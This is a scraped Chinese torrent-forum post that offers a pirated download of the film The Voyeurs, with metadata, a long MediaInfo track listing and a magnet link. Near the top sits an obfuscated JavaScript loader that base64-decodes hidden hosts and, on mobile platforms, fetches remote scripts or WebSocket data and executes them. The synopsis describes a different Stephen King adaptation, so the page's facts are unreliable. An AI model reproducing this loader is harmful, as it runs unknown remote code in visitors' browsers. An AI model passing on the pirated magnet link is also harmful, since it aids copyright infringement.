偷窥者[中文字幕].The.Voyeurs.2021.1080p.AMZN.WEB-DL.DDP5.1.H.264 13.02GB

版主小s 12天前 981

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 偷窥者 / 偷窥程魔

◎片 名 The Voyeurs

◎年 代 2021

◎产 地 美国

◎类 别 惊悚

◎语 言 英语

◎上映日期 2021-09-10(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt11235772/

◎豆瓣评分 6.7/10 (924人评价)

◎豆瓣链接 https://movie.douban.com/subject/34981939/

◎导 演 迈克尔·莫汉 Michael Mohan (id:1328387)

◎编 剧 迈克尔·莫汉 Michael Mohan (id:1328387)

◎演 员 西德妮·斯威尼 Sydney Sweeney (id:1388812)

贾斯蒂斯·史密斯 Justice Smith (id:1350981)

本·哈迪 Ben Hardy (id:1344763)

刘承羽 Natasha Liu Bordizzo (id:1354641)

◎标 签 悬疑 / 美国 / 惊悚 / 犯罪 / 2021 / 情色 / 西德妮·斯威尼 / 美国电影

◎简 介

Adrien Brody饰演船长Charles Boone,妻子在海上不幸去世后,他带着孩子回到缅因州的小镇普雷切尔角,一段黑暗的家族历史将始终困扰着他们。根据史蒂芬·金的短篇小说《耶路撒冷地》改编。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 283373584086454733857526394606109299248 (0xD52FC460EE3C85A120E40C9A38B79230)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 13.0 GiB

  8. Duration : 1 h 56 min

  9. Overall bit rate : 16.0 Mb/s

  10. Encoded date : UTC 2021-09-13 03:09:30

  11. Writing application : mkvmerge v48.0.0 ('Fortress Around Your Heart') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.0


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 56 min

  23. Bit rate : 9 618 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.261

  34. Stream size : 7.81 GiB (60%)

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : E-AC-3

  44. Format/Info : Enhanced AC-3

  45. Commercial name : Dolby Digital Plus

  46. Codec ID : A_EAC3

  47. Duration : 1 h 56 min

  48. Bit rate mode : Constant

  49. Bit rate : 640 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 533 MiB (4%)

  56. Title : Deutsch

  57. Language : German

  58. Service kind : Complete Main

  59. Default : No

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : E-AC-3

  64. Format/Info : Enhanced AC-3

  65. Commercial name : Dolby Digital Plus

  66. Codec ID : A_EAC3

  67. Duration : 1 h 56 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 533 MiB (4%)

  76. Title : English

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : E-AC-3

  84. Format/Info : Enhanced AC-3

  85. Commercial name : Dolby Digital Plus

  86. Codec ID : A_EAC3

  87. Duration : 1 h 56 min

  88. Bit rate mode : Constant

  89. Bit rate : 640 kb/s

  90. Channel(s) : 6 channels

  91. Channel layout : L R C LFE Ls Rs

  92. Sampling rate : 48.0 kHz

  93. Frame rate : 31.250 FPS (1536 SPF)

  94. Compression mode : Lossy

  95. Stream size : 533 MiB (4%)

  96. Title : English [Audio Description]

  97. Language : English

  98. Service kind : Complete Main

  99. Default : No

  100. Forced : No


  101. Audio #4

  102. ID : 5

  103. Format : E-AC-3

  104. Format/Info : Enhanced AC-3

  105. Commercial name : Dolby Digital Plus

  106. Codec ID : A_EAC3

  107. Duration : 1 h 56 min

  108. Bit rate mode : Constant

  109. Bit rate : 640 kb/s

  110. Channel(s) : 6 channels

  111. Channel layout : L R C LFE Ls Rs

  112. Sampling rate : 48.0 kHz

  113. Frame rate : 31.250 FPS (1536 SPF)

  114. Compression mode : Lossy

  115. Stream size : 533 MiB (4%)

  116. Title : Espa?ol (Espa?a)

  117. Language : Spanish

  118. Service kind : Complete Main

  119. Default : No

  120. Forced : No


  121. Audio #5

  122. ID : 6

  123. Format : E-AC-3

  124. Format/Info : Enhanced AC-3

  125. Commercial name : Dolby Digital Plus

  126. Codec ID : A_EAC3

  127. Duration : 1 h 56 min

  128. Bit rate mode : Constant

  129. Bit rate : 640 kb/s

  130. Channel(s) : 6 channels

  131. Channel layout : L R C LFE Ls Rs

  132. Sampling rate : 48.0 kHz

  133. Frame rate : 31.250 FPS (1536 SPF)

  134. Compression mode : Lossy

  135. Stream size : 533 MiB (4%)

  136. Title : Espa?ol (Latinoamérica)

  137. Language : Spanish

  138. Service kind : Complete Main

  139. Default : No

  140. Forced : No


  141. Audio #6

  142. ID : 7

  143. Format : E-AC-3

  144. Format/Info : Enhanced AC-3

  145. Commercial name : Dolby Digital Plus

  146. Codec ID : A_EAC3

  147. Duration : 1 h 56 min

  148. Bit rate mode : Constant

  149. Bit rate : 640 kb/s

  150. Channel(s) : 6 channels

  151. Channel layout : L R C LFE Ls Rs

  152. Sampling rate : 48.0 kHz

  153. Frame rate : 31.250 FPS (1536 SPF)

  154. Compression mode : Lossy

  155. Stream size : 533 MiB (4%)

  156. Title : Fran?ais

  157. Language : French

  158. Service kind : Complete Main

  159. Default : No

  160. Forced : No


  161. Audio #7

  162. ID : 8

  163. Format : E-AC-3

  164. Format/Info : Enhanced AC-3

  165. Commercial name : Dolby Digital Plus

  166. Codec ID : A_EAC3

  167. Duration : 1 h 56 min

  168. Bit rate mode : Constant

  169. Bit rate : 640 kb/s

  170. Channel(s) : 6 channels

  171. Channel layout : L R C LFE Ls Rs

  172. Sampling rate : 48.0 kHz

  173. Frame rate : 31.250 FPS (1536 SPF)

  174. Compression mode : Lossy

  175. Stream size : 533 MiB (4%)

  176. Title : Italiano

  177. Language : Italian

  178. Service kind : Complete Main

  179. Default : No

  180. Forced : No


  181. Audio #8

  182. ID : 9

  183. Format : E-AC-3

  184. Format/Info : Enhanced AC-3

  185. Commercial name : Dolby Digital Plus

  186. Codec ID : A_EAC3

  187. Duration : 1 h 56 min

  188. Bit rate mode : Constant

  189. Bit rate : 640 kb/s

  190. Channel(s) : 6 channels

  191. Channel layout : L R C LFE Ls Rs

  192. Sampling rate : 48.0 kHz

  193. Frame rate : 31.250 FPS (1536 SPF)

  194. Compression mode : Lossy

  195. Stream size : 533 MiB (4%)

  196. Title : Polski

  197. Language : Polish

  198. Service kind : Complete Main

  199. Default : No

  200. Forced : No


  201. Audio #9

  202. ID : 10

  203. Format : E-AC-3

  204. Format/Info : Enhanced AC-3

  205. Commercial name : Dolby Digital Plus

  206. Codec ID : A_EAC3

  207. Duration : 1 h 56 min

  208. Bit rate mode : Constant

  209. Bit rate : 640 kb/s

  210. Channel(s) : 6 channels

  211. Channel layout : L R C LFE Ls Rs

  212. Sampling rate : 48.0 kHz

  213. Frame rate : 31.250 FPS (1536 SPF)

  214. Compression mode : Lossy

  215. Stream size : 533 MiB (4%)

  216. Title : Português

  217. Language : Portuguese

  218. Service kind : Complete Main

  219. Default : No

  220. Forced : No


  221. Audio #10

  222. ID : 11

  223. Format : E-AC-3

  224. Format/Info : Enhanced AC-3

  225. Commercial name : Dolby Digital Plus

  226. Codec ID : A_EAC3

  227. Duration : 1 h 56 min

  228. Bit rate mode : Constant

  229. Bit rate : 640 kb/s

  230. Channel(s) : 6 channels

  231. Channel layout : L R C LFE Ls Rs

  232. Sampling rate : 48.0 kHz

  233. Frame rate : 31.250 FPS (1536 SPF)

  234. Compression mode : Lossy

  235. Stream size : 533 MiB (4%)

  236. Title : 日本語

  237. Language : Japanese

  238. Service kind : Complete Main

  239. Default : No

  240. Forced : No


  241. Text #1

  242. ID : 12

  243. Format : UTF-8

  244. Codec ID : S_TEXT/UTF8

  245. Codec ID/Info : UTF-8 Plain Text

  246. Duration : 1 h 54 min

  247. Bit rate : 38 b/s

  248. Count of elements : 1136

  249. Stream size : 31.7 KiB (0%)

  250. Title : Bahasa Melayu

  251. Language : Malay

  252. Default : No

  253. Forced : No


  254. Text #2

  255. ID : 13

  256. Format : UTF-8

  257. Codec ID : S_TEXT/UTF8

  258. Codec ID/Info : UTF-8 Plain Text

  259. Duration : 1 h 54 min

  260. Bit rate : 39 b/s

  261. Count of elements : 1134

  262. Stream size : 32.6 KiB (0%)

  263. Title : Dansk

  264. Language : Danish

  265. Default : No

  266. Forced : No


  267. Text #3

  268. ID : 14

  269. Format : UTF-8

  270. Codec ID : S_TEXT/UTF8

  271. Codec ID/Info : UTF-8 Plain Text

  272. Duration : 1 h 53 min

  273. Bit rate : 44 b/s

  274. Count of elements : 1011

  275. Stream size : 36.9 KiB (0%)

  276. Title : Deutsch

  277. Language : German

  278. Default : No

  279. Forced : No


  280. Text #4

  281. ID : 15

  282. Format : UTF-8

  283. Codec ID : S_TEXT/UTF8

  284. Codec ID/Info : UTF-8 Plain Text

  285. Duration : 1 h 55 min

  286. Bit rate : 60 b/s

  287. Count of elements : 1815

  288. Stream size : 51.5 KiB (0%)

  289. Title : English (SDH)

  290. Language : English

  291. Default : No

  292. Forced : No


  293. Text #5

  294. ID : 16

  295. Format : UTF-8

  296. Codec ID : S_TEXT/UTF8

  297. Codec ID/Info : UTF-8 Plain Text

  298. Duration : 1 h 55 min

  299. Bit rate : 37 b/s

  300. Count of elements : 1131

  301. Stream size : 32.1 KiB (0%)

  302. Title : Espa?ol (Espa?a)

  303. Language : Spanish

  304. Default : No

  305. Forced : No


  306. Text #6

  307. ID : 17

  308. Format : UTF-8

  309. Codec ID : S_TEXT/UTF8

  310. Codec ID/Info : UTF-8 Plain Text

  311. Duration : 1 h 55 min

  312. Bit rate : 39 b/s

  313. Count of elements : 1138

  314. Stream size : 33.3 KiB (0%)

  315. Title : Espa?ol (Latinoamérica)

  316. Language : Spanish

  317. Default : No

  318. Forced : No


  319. Text #7

  320. ID : 18

  321. Format : UTF-8

  322. Codec ID : S_TEXT/UTF8

  323. Codec ID/Info : UTF-8 Plain Text

  324. Duration : 1 h 53 min

  325. Bit rate : 41 b/s

  326. Count of elements : 1115

  327. Stream size : 34.8 KiB (0%)

  328. Title : Filipino

  329. Language : fil

  330. Default : No

  331. Forced : No


  332. Text #8

  333. ID : 19

  334. Format : UTF-8

  335. Codec ID : S_TEXT/UTF8

  336. Codec ID/Info : UTF-8 Plain Text

  337. Duration : 1 h 55 min

  338. Bit rate : 40 b/s

  339. Count of elements : 1111

  340. Stream size : 34.6 KiB (0%)

  341. Title : Fran?ais

  342. Language : French

  343. Default : No

  344. Forced : No


  345. Text #9

  346. ID : 20

  347. Format : UTF-8

  348. Codec ID : S_TEXT/UTF8

  349. Codec ID/Info : UTF-8 Plain Text

  350. Duration : 1 h 54 min

  351. Bit rate : 40 b/s

  352. Count of elements : 1136

  353. Stream size : 33.4 KiB (0%)

  354. Title : Indonesia

  355. Language : Indonesian

  356. Default : No

  357. Forced : No


  358. Text #10

  359. ID : 21

  360. Format : UTF-8

  361. Codec ID : S_TEXT/UTF8

  362. Codec ID/Info : UTF-8 Plain Text

  363. Duration : 1 h 53 min

  364. Bit rate : 42 b/s

  365. Count of elements : 1134

  366. Stream size : 35.4 KiB (0%)

  367. Title : Italiano

  368. Language : Italian

  369. Default : No

  370. Forced : No


  371. Text #11

  372. ID : 22

  373. Format : UTF-8

  374. Codec ID : S_TEXT/UTF8

  375. Codec ID/Info : UTF-8 Plain Text

  376. Duration : 1 h 55 min

  377. Bit rate : 40 b/s

  378. Count of elements : 1139

  379. Stream size : 34.1 KiB (0%)

  380. Title : Magyar

  381. Language : Hungarian

  382. Default : No

  383. Forced : No


  384. Text #12

  385. ID : 23

  386. Format : UTF-8

  387. Codec ID : S_TEXT/UTF8

  388. Codec ID/Info : UTF-8 Plain Text

  389. Duration : 1 h 54 min

  390. Bit rate : 40 b/s

  391. Count of elements : 1134

  392. Stream size : 34.0 KiB (0%)

  393. Title : Nederlands

  394. Language : Dutch

  395. Default : No

  396. Forced : No


  397. Text #13

  398. ID : 24

  399. Format : UTF-8

  400. Codec ID : S_TEXT/UTF8

  401. Codec ID/Info : UTF-8 Plain Text

  402. Duration : 1 h 54 min

  403. Bit rate : 38 b/s

  404. Count of elements : 1134

  405. Stream size : 31.9 KiB (0%)

  406. Title : Norsk Bokm?l

  407. Language : Norwegian Bokmal

  408. Default : No

  409. Forced : No


  410. Text #14

  411. ID : 25

  412. Format : UTF-8

  413. Codec ID : S_TEXT/UTF8

  414. Codec ID/Info : UTF-8 Plain Text

  415. Duration : 1 h 55 min

  416. Bit rate : 38 b/s

  417. Count of elements : 1129

  418. Stream size : 32.1 KiB (0%)

  419. Title : Polski

  420. Language : Polish

  421. Default : No

  422. Forced : No


  423. Text #15

  424. ID : 26

  425. Format : UTF-8

  426. Codec ID : S_TEXT/UTF8

  427. Codec ID/Info : UTF-8 Plain Text

  428. Duration : 1 h 55 min

  429. Bit rate : 39 b/s

  430. Count of elements : 1138

  431. Stream size : 33.4 KiB (0%)

  432. Title : Português (Brasil)

  433. Language : Portuguese

  434. Default : No

  435. Forced : No


  436. Text #16

  437. ID : 27

  438. Format : UTF-8

  439. Codec ID : S_TEXT/UTF8

  440. Codec ID/Info : UTF-8 Plain Text

  441. Duration : 1 h 55 min

  442. Bit rate : 39 b/s

  443. Count of elements : 1137

  444. Stream size : 33.7 KiB (0%)

  445. Title : Português (Portugal)

  446. Language : Portuguese

  447. Default : No

  448. Forced : No


  449. Text #17

  450. ID : 28

  451. Format : UTF-8

  452. Codec ID : S_TEXT/UTF8

  453. Codec ID/Info : UTF-8 Plain Text

  454. Duration : 1 h 55 min

  455. Bit rate : 41 b/s

  456. Count of elements : 1137

  457. Stream size : 35.0 KiB (0%)

  458. Title : Roman?

  459. Language : Romanian

  460. Default : No

  461. Forced : No


  462. Text #18

  463. ID : 29

  464. Format : UTF-8

  465. Codec ID : S_TEXT/UTF8

  466. Codec ID/Info : UTF-8 Plain Text

  467. Duration : 1 h 55 min

  468. Bit rate : 38 b/s

  469. Count of elements : 1132

  470. Stream size : 32.7 KiB (0%)

  471. Title : Suomi

  472. Language : Finnish

  473. Default : No

  474. Forced : No


  475. Text #19

  476. ID : 30

  477. Format : UTF-8

  478. Codec ID : S_TEXT/UTF8

  479. Codec ID/Info : UTF-8 Plain Text

  480. Duration : 1 h 55 min

  481. Bit rate : 42 b/s

  482. Count of elements : 1137

  483. Stream size : 36.3 KiB (0%)

  484. Title : Svenska

  485. Language : Swedish

  486. Default : No

  487. Forced : No


  488. Text #20

  489. ID : 31

  490. Format : UTF-8

  491. Codec ID : S_TEXT/UTF8

  492. Codec ID/Info : UTF-8 Plain Text

  493. Duration : 1 h 55 min

  494. Bit rate : 42 b/s

  495. Count of elements : 1138

  496. Stream size : 35.8 KiB (0%)

  497. Title : Türk?e

  498. Language : Turkish

  499. Default : No

  500. Forced : No


  501. Text #21

  502. ID : 32

  503. Format : UTF-8

  504. Codec ID : S_TEXT/UTF8

  505. Codec ID/Info : UTF-8 Plain Text

  506. Duration : 1 h 55 min

  507. Bit rate : 38 b/s

  508. Count of elements : 1137

  509. Stream size : 32.2 KiB (0%)

  510. Title : ?e?tina

  511. Language : Czech

  512. Default : No

  513. Forced : No


  514. Text #22

  515. ID : 33

  516. Format : UTF-8

  517. Codec ID : S_TEXT/UTF8

  518. Codec ID/Info : UTF-8 Plain Text

  519. Duration : 1 h 55 min

  520. Bit rate : 70 b/s

  521. Count of elements : 1139

  522. Stream size : 59.1 KiB (0%)

  523. Title : Ελληνικ?

  524. Language : Greek

  525. Default : No

  526. Forced : No


  527. Text #23

  528. ID : 34

  529. Format : UTF-8

  530. Codec ID : S_TEXT/UTF8

  531. Codec ID/Info : UTF-8 Plain Text

  532. Duration : 1 h 55 min

  533. Bit rate : 66 b/s

  534. Count of elements : 1141

  535. Stream size : 55.7 KiB (0%)

  536. Title : Русский

  537. Language : Russian

  538. Default : No

  539. Forced : No


  540. Text #24

  541. ID : 35

  542. Format : UTF-8

  543. Codec ID : S_TEXT/UTF8

  544. Codec ID/Info : UTF-8 Plain Text

  545. Duration : 1 h 55 min

  546. Bit rate : 65 b/s

  547. Count of elements : 1141

  548. Stream size : 55.5 KiB (0%)

  549. Title : ?????

  550. Language : Hebrew

  551. Default : No

  552. Forced : No


  553. Text #25

  554. ID : 36

  555. Format : UTF-8

  556. Codec ID : S_TEXT/UTF8

  557. Codec ID/Info : UTF-8 Plain Text

  558. Duration : 1 h 55 min

  559. Bit rate : 71 b/s

  560. Count of elements : 1141

  561. Stream size : 60.4 KiB (0%)

  562. Title : ???????

  563. Language : Arabic

  564. Default : No

  565. Forced : No


  566. Text #26

  567. ID : 37

  568. Format : UTF-8

  569. Codec ID : S_TEXT/UTF8

  570. Codec ID/Info : UTF-8 Plain Text

  571. Duration : 1 h 55 min

  572. Bit rate : 99 b/s

  573. Count of elements : 1141

  574. Stream size : 84.2 KiB (0%)

  575. Title : ??????

  576. Language : Hindi

  577. Default : No

  578. Forced : No


  579. Text #27

  580. ID : 38

  581. Format : UTF-8

  582. Codec ID : S_TEXT/UTF8

  583. Codec ID/Info : UTF-8 Plain Text

  584. Duration : 1 h 55 min

  585. Bit rate : 108 b/s

  586. Count of elements : 1141

  587. Stream size : 91.3 KiB (0%)

  588. Title : ?????

  589. Language : Tamil

  590. Default : No

  591. Forced : No


  592. Text #28

  593. ID : 39

  594. Format : UTF-8

  595. Codec ID : S_TEXT/UTF8

  596. Codec ID/Info : UTF-8 Plain Text

  597. Duration : 1 h 55 min

  598. Bit rate : 107 b/s

  599. Count of elements : 1141

  600. Stream size : 90.8 KiB (0%)

  601. Title : ??????

  602. Language : Telugu

  603. Default : No

  604. Forced : No


  605. Text #29

  606. ID : 40

  607. Format : UTF-8

  608. Codec ID : S_TEXT/UTF8

  609. Codec ID/Info : UTF-8 Plain Text

  610. Duration : 1 h 55 min

  611. Bit rate : 99 b/s

  612. Count of elements : 1141

  613. Stream size : 84.3 KiB (0%)

  614. Title : ???

  615. Language : Thai

  616. Default : No

  617. Forced : No


  618. Text #30

  619. ID : 41

  620. Format : UTF-8

  621. Codec ID : S_TEXT/UTF8

  622. Codec ID/Info : UTF-8 Plain Text

  623. Duration : 1 h 55 min

  624. Bit rate : 39 b/s

  625. Count of elements : 1141

  626. Stream size : 33.5 KiB (0%)

  627. Title : 中文(简体)

  628. Language : Chinese

  629. Default : No

  630. Forced : No


  631. Text #31

  632. ID : 42

  633. Format : UTF-8

  634. Codec ID : S_TEXT/UTF8

  635. Codec ID/Info : UTF-8 Plain Text

  636. Duration : 1 h 55 min

  637. Bit rate : 38 b/s

  638. Count of elements : 1141

  639. Stream size : 32.7 KiB (0%)

  640. Title : 中文(繁體)

  641. Language : Chinese

  642. Default : No

  643. Forced : No


  644. Text #32

  645. ID : 43

  646. Format : UTF-8

  647. Codec ID : S_TEXT/UTF8

  648. Codec ID/Info : UTF-8 Plain Text

  649. Duration : 1 h 55 min

  650. Bit rate : 36 b/s

  651. Count of elements : 1211

  652. Stream size : 30.9 KiB (0%)

  653. Title : 日本語

  654. Language : Japanese

  655. Default : No

  656. Forced : No


  657. Text #33

  658. ID : 44

  659. Format : UTF-8

  660. Codec ID : S_TEXT/UTF8

  661. Codec ID/Info : UTF-8 Plain Text

  662. Duration : 1 h 55 min

  663. Bit rate : 41 b/s

  664. Count of elements : 1139

  665. Stream size : 35.0 KiB (0%)

  666. Title : ???

  667. Language : Korean

  668. Default : No

  669. Forced : No


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:3BA3C3910806811E345B60A69E11A79EF5DC3D29
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回